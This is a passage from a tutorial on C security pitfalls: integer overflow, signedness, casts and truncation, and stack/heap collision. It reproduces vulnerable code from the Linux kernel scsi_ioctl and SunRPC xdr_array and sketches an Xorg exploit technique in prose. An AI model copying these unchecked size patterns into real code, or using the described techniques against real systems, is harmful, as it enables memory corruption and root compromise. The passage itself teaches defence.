        if (len2 < sizeof(buf) - len1) ...

is no good: if len1 is a bit larger than sizeof(buf) the right-hand side is a huge positive integer and the test will succeed.

(2) Arithmetic overflow causes surprises.

In the previous example, also the test

        if (len1 + len2 < sizeof(buf)) ...

can lead to problems since the sum of two numbers can be small while the numbers themselves are huge. Similar things occur with multiplication, e.g. when allocating a number of structs:

        p = (struct foo *) malloc(n * sizeof(struct foo));
        if (p == NULL)
                error;
        for (i = 0; i < n; i++)
                do_something_with(p[i]);

Here, if for example sizeof(struct foo) is 256 and n equals 16777217, then room for only a single struct is allocated, and afterwards memory is overwritten.

(3) Casting changes interpretation.

Casting an int to an unsigned int changes a negative value to a huge positive value. The cast can be explicit, or happen because there is an unsigned somewhere in the expression, or happen because of an assignment, or because of the implicit assignment for a function call.

For example, the size parameter of strncpy() is unsigned, and the program

#include <string.h>

int main() {
        char buf[4];
        int i, n;

        n = sizeof(buf);
        i = -1;
        if (i < n)
                strncpy(buf, "ach", i);
        return 0;
}

will segfault (since strncpy() copies the string and then pads with NULs up to the indicated length).

(3a) Truncation.

Casting or assignment can change the length of a variable, so that it loses its most significant bits.

(4) Signedness.

In this same general area belong programming errors where the programmer just forgets that a variable may be negative.

Small actual example

In Jan 2005 it was noticed that in the Linux kernel, file drivers/block/scsi_ioctl.c there is the code

static int sg_scsi_ioctl(struct file *file, request_queue_t *q, ... ) {
        char *buffer = NULL;
        int bytes;
        int in_len, out_len;                    /* two integers */
        ...
        if (get_user(in_len, &sic->inlen))  /* read from user space */
                return -EFAULT;
        if (get_user(out_len, &sic->outlen))
                return -EFAULT;
        if (in_len > PAGE_SIZE || out_len > PAGE_SIZE)
                return -EINVAL;
        ...
        bytes = max(in_len, out_len);
        if (bytes) {
                buffer = kmalloc(bytes, q->bounce_gfp | GFP_USER);
                if (!buffer)
                        return -ENOMEM;
                memset(buffer, 0, bytes);
        }
        ...
        if (copy_from_user(buffer, sic->data + cmdlen, in_len))
                goto error;
...
}

Thus, a local user can make in_len negative, and out_len positive, the kernel will allocate a small buffer and copy a huge amount of user data to kernel memory. It will be easy to crash the kernel, more difficult to create an exploit. A requirement is the ability to open at least one SCSI device and do the SCSI_IOCTL_SEND_COMMAND ioctl.

The SunRPC XDR integer overflow

The routine xdr_array() in xdr_array.c contained code somewhat like

bool_t
xdr_array (xdrs, addrp, sizep, maxsize, elsize, elproc)
     XDR *xdrs;
     caddr_t *addrp;            /* array pointer */
     u_int *sizep;              /* number of elements */
     u_int maxsize;             /* max numberof elements */
     u_int elsize;              /* size in bytes of each element */
     xdrproc_t elproc;          /* xdr routine to handle each element */
{
  u_int i;
  caddr_t target = *addrp;
  u_int c;
  bool_t stat = TRUE;
  u_int nodesize;

  /* get array length */
  if (!xdr_u_int (xdrs, sizep))
      return FALSE;
  c = *sizep;
  if ((c > maxsize) && (xdrs->x_op != XDR_FREE))
      return FALSE;
  nodesize = c * elsize;

  /* allocate array */
  if (c == 0)
      return TRUE;
  *addrp = target = mem_alloc (nodesize);
  if (target == NULL) {
      fprintf (stderr, "xdr_array: out of memory\n");
      return FALSE;
  }
  __bzero (target, nodesize);
  ...

Here the expression c * elsize can overflow. The fix was to replace if (c > maxsize) by if (c > maxsize || c > LASTUNSIGNED / elsize) to make sure that multiplication could not lead to overflow.

Historical examples

There has been a 2002 integer overflow in the SunRPC XDR libraries. Since these libraries have been copied into many systems, this led to remote root vulnerability in lots of places, including Sun, *BSD, Linux. This vulnerability involved the xdr_array() routine. The year after, a similar bug was discovered involving the xdrmem_getbytes() function.

There has been a 2003 integer overflow in Snort with exploit: if root is running Snort to monitor his network, a remote attacker can get a root shell by sending appropriately crafted packets.

There has been a Jan 2005 integer overflow in libtiff, allowing remote code execution on machines with a user willing to look at one's pictures, e.g., with a browser.

There is a Feb 2008 integer overflow in the Linux kernel, allowing a local root exploit. (See below.)

10.11 Stack/heap collision

On most architectures the stack grows downward, the heap grows upward, and mmap also maps regions of memory somewhere. How is stack overflow discovered? By a page fault when a missing stack page is accessed. Now the kernel will either extend the stack by mapping another page there or kill the program with a segfault.

However, the user program can have large arrays on the stack, and the array access can in fact access heap memory or mmap'ed memory. For a user program it is difficult to protect itself against this. The problems were discussed extensively in Gael Delalleu's writeup.

Five years later Rafal Wojtczuk described an Xorg server exploit that uses these ideas. Fill up the server's address space with pixmaps, then fill up what is left with shared memory segments, that come up very close to the stack. Force X to call a recursive function that grows the stack into the shm segments. No page fault occurs since the memory was allocated already. Observe which segment changed, and do it again, this time simultaneously spamming that segment with a pointer to exploit code. Effectively this is a combination of race and buffer overflow. If the race is won, a return address is overwritten and exploit code will be run with the uid of the server, probably root.

As a mitigation, the Linux 2.6.36 kernel now has a guard page below the stack, so that this can happen only with programs that allocate large arrays on the stack.

Next Previous Contents